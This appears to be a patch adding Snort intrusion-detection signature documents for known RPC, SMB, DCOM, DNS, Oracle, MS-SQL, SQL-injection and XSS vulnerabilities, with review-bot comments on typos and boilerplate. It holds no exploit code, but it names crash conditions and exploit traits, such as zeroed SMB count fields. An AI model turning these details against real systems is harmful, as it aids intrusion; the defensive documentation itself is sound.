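Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") and the Attack Scenarios paragraph about accessing "an authentication mechanism" are generic CGI boilerplate that does not describe the remote file include in "$_CONF[path]" named in the Summary; replace them with a scenario in which a remote file is supplied via that parameter. Typos and wording: "ona web server" should be "on a web server", "may indicate that an exploitation attempt has been attempted" is redundant (suggest "may indicate an exploitation attempt"), and "attackers choosing" needs the possessive apostrophe. The Affected Systems and Contributors sections lack the blank line before their "--" separators, and the file starts with two empty lines.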
--- /dev/null
+++ b/doc/signatures/1587.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1587
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
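Review bot: Same issues as the other generic web server documents in this patch: "attackers choosing" in Impact needs an apostrophe ("attacker's choosing"), and the Summary, Impact and Detailed Information sections contain lines with trailing whitespace ("...exploit a known ", "...arbitrary code of ", "...implementation and the ", "...the victim server and "). Additional References is empty.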
--- /dev/null
+++ b/doc/signatures/1747.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1747
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cachefsd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cachefsd is using.  Attackers can also learn what versions of the cachefsd protocol are accepted by cachefsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cachefsd run.  The cachefsd RPC service is used by Solaris hosts to cache requests for remote file systems mounted by the Network File System (NFS).  There is a vulnerability associated with cachefsd that may cause a buffer overflow, allowing an attacker to execute abitrary code with the privileges of cachefsd, possibly root. 
+
+--
+Affected Systems:
+Solaris 2.5.1, 2.6, 7, 8, 9
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cachefsd runs.  This may be a precursor to an attack to exploit the cachefsd buffer overflow.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user is allowed to perform NFS mounts, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cachefsd, not probes of the cachefsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cachefsd service itself. An attacker may attempt to go directly to the cachefsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2002-0084
+
+Bugtraq:
+http://www.securityfocus.com/bid/4674
+
+
+--
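Review bot: Typo in Detailed Information: "execute abitrary code" should be "execute arbitrary code". The same sentence ends with trailing whitespace, as does the Corrective Action line "...access is denied to RPC-enabled machines. ". The False Negatives paragraph is a useful caveat and could be referenced from the Corrective Action section, since filtering RPC ports at the firewall also addresses direct connections to the cachefsd port that this rule cannot see.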
--- /dev/null
+++ b/doc/signatures/1181.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1181
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
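Review bot: This document repeats the generic web server text used for Sids 1217 and 1587 and carries the same defects: "attackers choosing" in Impact lacks the possessive apostrophe, and the Summary, Impact and Detailed Information paragraphs have lines ending in trailing whitespace ("...exploit a known ", "...arbitrary code of ", "...implementation and the ", "...the victim server and "). Additional References is empty.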
--- /dev/null
+++ b/doc/signatures/1159.txt
@@ -0,0 +1,62 @@
+Rule:  
+--
+
+Sid:
+1159
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the webplus
+CGI script.
+
+--
+Impact:
+Information Gathering.
+
+--
+Detailed Information:
+Some versions of TalentSoft Web+ contain vulnerabilities that can
+allow arbitrary files to be read or executed by an attacker. Disclosure
+of script source code is also possible.
+
+--
+Affected Systems:
+	TalentSoft Web+
+
+--
+Attack Scenarios:
+An attacker needs to supply a malicious request to the server containing
+webplus?script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply any appropriate vendor supplied patches.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
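Review bot: Typo under Contributors: "Original document author unkown" should be "unknown". The separator layout at the top of the file ("Rule:  " followed by "--", a blank line, then "Sid:") differs from the other documents, which put the blank line before "--"; also "Rule:  " has trailing whitespace. In Attack Scenarios, "webplus?script" appears to be a literal request pattern and should be quoted so it is not read as prose. Additional References is empty for a named product with known vulnerabilities.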
--- /dev/null
+++ b/doc/signatures/1907.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
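Review bot: The Sid in this file does not match the file name: the document is added as doc/signatures/1907.txt but the Sid section reads "1909"; one of the two is wrong and must be corrected before the documentation is indexed. The "--" separator between "Rule:" and "Sid:" is missing (every other document has it), and there is a line containing a single space before the "--" that precedes Affected Systems, plus trailing whitespace on "RPC-enabled machines. ". Additional References is empty even though a specific function (rtable_insert()) and affected versions are named.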
--- /dev/null
+++ b/doc/signatures/2101.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+
+--
+Sid: 2101
+
+--
+Summary:
+
+A buffer overflow exists in the SMB (Server Message Block) Protocol 
+implementation in Microsfot Windows NT, Windows 2000, and Windows XP 
+that allows attackers to cause a denial of service via a NetShareEnum 
+request.
+
+--
+Impact:
+
+An attacker can cause the target system to lock up and require manual
+reboot.  With more research, an attacker may be able to exploit this
+buffer overflow and execute arbitrary code, but this research has not
+been made public at this time.
+
+--
+Detailed Information:
+
+SMB on a vulnerable system may crash if it recieves a specially crafted
+packet containing a NetServerEnum, NetServerEnum2, or NetServerEnum3 
+transaction request.  If either the paramaters "Max Parameter Count" or
+"Max Data Count" are set to 0, then a vulnerable system will crash.  
+NetServerEnum requests require an authorized user account, however 
+NetServerEnum2 and NetServerEnum3 require anonymous access.  Anonymous
+access is enabled by default.  This signature looks for both the "Max Parameter Count" and "Max Data Count" set to 0.
+
+--
+Attack Scenarios:
+
+Simple. An attacker would use one of the various publicly available 
+tools to launch this attack.
+
+--
+Ease of Attack:
+
+Numerous tools, including a windows binary (SMBDie.exe), have been made
+publicly available to exploit the denial of service portion of this 
+vulnerability.
+
+--
+False Positives:
+
+This rule may generate an event on functions other than NetServerEnum, 
+NetServerEnum2, or NetServerEnum3.  An SMB decoder is not available in 
+Snort, thus verification that the function being called is not feasable.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Install the patches available from Microsoft.  The patches are listed in
+Microsoft's advisory for this vulnerability.
+
+www.microsoft.com/technet/security/bulletin/MS02-045.asp
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@snort.org>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+cve,CAN-2002-0724
+
+Microsoft:
+url,www.microsoft.com/technet/security/bulletin/MS02-045.asp; 
+url,www.corest.com/common/showdoc.php?idx=262; 
+
+--
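Review bot: The Attack Scenarios and Ease of Attack sections appear to have their contents swapped: Attack Scenarios begins "Simple. An attacker would use one of the various publicly available tools..." while Ease of Attack lists the tools (SMBDie.exe) and their availability. The Summary refers to a "NetShareEnum request" but Detailed Information describes NetServerEnum, NetServerEnum2 and NetServerEnum3 transactions; make these consistent. Typos: "Microsfot", "recieves", "paramaters", "feasable", and "Open Windows"-style capitalisation aside, the sentence "thus verification that the function being called is not feasable" is missing words (suggest "thus verifying which function is being called is not feasible"); "NetServerEnum2 and NetServerEnum3 require anonymous access" should read "only require anonymous access". The Additional References entries use raw Snort rule reference syntax ("cve,CAN-2002-0724", "url,...;") instead of the URL style used by the other documents.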
--- /dev/null
+++ b/doc/signatures/2968.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2968
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
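Review bot: This document is identical to the one for Sid 2960 apart from the Sid, and carries the same punctuation defects: the Impact line "Serious. Execution of arbitrary code with system level privileges" and the Corrective Action line "Apply the appropriate vendor supplied patches" both lack a terminating full stop.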
--- /dev/null
+++ b/doc/signatures/2492.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2492
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
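Review bot: The Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") does not describe the RPC DCOM bind and malformed request discussed in Detailed Information and should be rewritten to match. The Summary wording "This rule no longer generates an event" is confusing on its own; move the flowbits explanation (rule activates sids 2351 and 2352, remove "flowbits:no_alert;" to alert directly) up so readers understand why the rule is silent by default, and drop the informal "Cool huh?". Typos: "Expoit code exists" (Ease of Attack) and "used by the worm to propogate" (Corrective Action).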
--- /dev/null
+++ b/doc/signatures/303.txt
@@ -0,0 +1,79 @@
+Rule:
+--
+Sid:
+303
+
+--
+Summary:
+A specific inverse query has been performed against your DNS server as a
+precursor to a possible transaction signature (TSIG) buffer overflow 
+attack. 
+
+--
+Impact:
+attempt to gain access to information required for the TSIG exploit.  A 
+TSIG buffer overflow exploit attempt will usually follow if there is a 
+response to the inverse query.
+
+
+--
+Detailed Information:
+This is an attempt to perform a specific DNS inverse query against your 
+DNS server.  While this specific action is not harmful itself, it 
+signals a precusor to a possible buffer overflow attack for a TSIG 
+vulernability.  The inverse query is performed for reconnaissance for 
+the TSIG attack. 
+
+--
+Affected Systems:
+BIND Versions 4 and through 8.2 are susceptible to the inverse query 
+information leak.
+
+
+--
+Attack Scenarios:
+The envisioned scenario is that if a DNS server responds to the inverse 
+query and leaks information required in the actual attack, the exploit 
+code then attacks the TSIG buffer overflow vulnerability.  If this is 
+successful, the attacker gains access to the DNS server at the privilege
+of the DNS daemon, named (potentially root). 
+
+
+--
+Ease of Attack:
+Code is available to exploit the vulnerability.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+A user could change the exploit code.  For instance, a user could change
+the DNS identification number in the code to be something other than 
+0xABCD and the rule would not fire.
+
+--
+Corrective Action:
+Update to BIND versions greater than 8.2 to prevent the information 
+leak.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2302
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0010
+
+Arachnids:
+http://www.whitehats.com/info/IDS482
+
+--
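Review bot: the Impact section begins mid-sentence with a lowercase "attempt to gain access to information required for the TSIG exploit."; its subject is missing (presumably something like "Reconnaissance attempt ..."). Also fix "precusor" and "vulernability" in Detailed Information, and "BIND Versions 4 and through 8.2" in Affected Systems should read "BIND versions 4 through 8.2". The False Negatives note (the rule keys on the DNS identification number 0xABCD, so a modified exploit will not fire it) is the kind of concrete detail the other files lack; keep it.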
--- /dev/null
+++ b/doc/signatures/2860.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2860
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_date
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
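Review bot: the procedure name in Detailed Information is split with the period orphaned on its own line ("vulnerability in the procedure add_priority_date" followed by a line containing only "."), which looks like a template substitution that was never reflowed; join it into "... the procedure add_priority_date. This procedure is included in sys.dbms_repcat_conf." Also "Oracle Oracle9i" in Affected Systems duplicates the vendor name, and Additional References is empty although Impact is rated Serious; a vendor advisory or CVE link would help triage.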
--- /dev/null
+++ b/doc/signatures/2050.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+2050
+
+--
+Summary:
+of MS-SQL server running on a host.
+
+--
+Impact:
+Denial of Service, possible code execution and control of the server.
+
+--
+Detailed Information:
+Versions of Microsofts implementation of SQL server running the 
+resolution service are subject to multiple buffer overflows.
+
+It is possible to overwrite memory with data of the attackers choosing, 
+resulting in a denial of service or possible code execution. This is 
+done by sending carefully crafted packets to the resolution service 
+running on the server.
+
+It is also possible for the attacker to cause a denial of service by 
+sending a spoofed packet purporting to be from one SQL server to 
+another. The resulting exchange between the two servers could result in 
+a denial of service.
+
+--
+Affected Systems:
+	Cisco BBSM 5.0
+	Cisco BBSM 5.1
+	Cisco CallManager 3.3.x
+	Cisco Unity 3.x
+	Cisco Unity 4.x
+	
+	Microsoft .NET Framework 1.0
+	Microsoft SQL Server 2000
+	Windows 2000 Any version
+	Windows NT Any version
+
+--
+Attack Scenarios:
+The SQL Slammer (Sapphire) worm exploited the vulnerabilities in this 
+service.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This rule can be triggered by UDP responses to requests originating from
+ephemeral port 1434. Example: a DNS response with transaction ID between
+0x0400 and 0x04FF.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Update all instances of the vulnerable systems with patches from the 
+vendor.
+
+Use a firewall to deny access to ports used by the SQL server, usually 
+1433 and 1434, from the Internet.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-039.asp
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0649
+
+Bugtraq:
+http://www.securityfocus.com/bid/5310
+http://www.securityfocus.com/bid/5311
+
+--
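Review bot: the Summary is truncated: it begins "of MS-SQL server running on a host." with no leading clause, so the reader cannot tell what the event indicates (from Detailed Information it is an attempt against the SQL Server resolution service). Also "Microsofts" and "attackers" need apostrophes. The False Positives entry is a genuinely useful operational note ("UDP responses to requests originating from ephemeral port 1434", with the DNS transaction ID example); keep it as written.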
--- /dev/null
+++ b/doc/signatures/100000559.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000559
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Infinite Core Technologies ICT" application running on a 
+webserver. Access to the file "index.php" with SQL commands being passed as the 
+"post" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "post" parameter in the "index.php" script used by the 
+"Infinite Core Technologies ICT" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Infinite Core Technologies ICT
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
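Review bot: the Detailed Information section mixes two templates: the first paragraph is specific to SQL injection via the "post" parameter of "index.php", but the third paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...") is the generic credential-bypass boilerplate and does not describe this event; drop it or rewrite it for SQL injection. The second paragraph is also a run-on ("... for the application, the attacker may also be able ..."), "ona" should be "on a", and the "--" separators after "Sid:" and "Affected Systems:" lack the blank line used elsewhere in these files.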
--- /dev/null
+++ b/doc/signatures/1708.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1708
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
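Review bot: "ona web server" in Detailed Information should be "on a web server", and "attackers choosing" needs an apostrophe (twice). Additional References is empty for a file that claims "Simple. Exploits exist."; a link to the specific vulnerability SID 1708 targets would make the entry actionable.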
--- /dev/null
+++ b/doc/signatures/100000825.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000825
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Phorum" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "mode" parameter in the "posting.php" script used by the "Phorum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Phorum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
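Review bot: the Impact section overstates a cross site scripting issue: "Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing" is the generic web-attack boilerplate, whereas the Attack Scenarios section correctly describes the risk as a malicious link that steals information from the user who clicks it. Suggest narrowing Impact to information theft and script execution in the victim's browser. Also "attackers choosing" needs an apostrophe, the "--" after "Sid:" and "Affected Systems:" lacks the blank line used in the other files, and the file starts with two empty lines.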
--- /dev/null
+++ b/doc/signatures/2649.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2649
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+
+An attacker can attempt to connect to a database using an overly
+long service_name value. This can cause a buffer overflow, allowing
+an attacker to execute arbitrary code.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+       Oracle7, Oracle8, Oracle8i, and Oracle9i
+
+--
+Attack Scenarios:
+An attacker can attempt to connect to a database supplying the
+service_name an overly long value.  The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck52.html
+
+--
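Review bot: the separator before Contributors is broken: "--Contributors:" runs the "--" divider and the heading together on one line, unlike every other section in this file, so anything that splits these files on lone "--" lines will merge Corrective Action and Contributors. Also "a Oracle database" should be "an Oracle database", and the note about setting $ORACLE_PORTS to "any" on Windows is rule configuration guidance that fits better under Corrective Action than in the middle of the vulnerability description.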
--- /dev/null
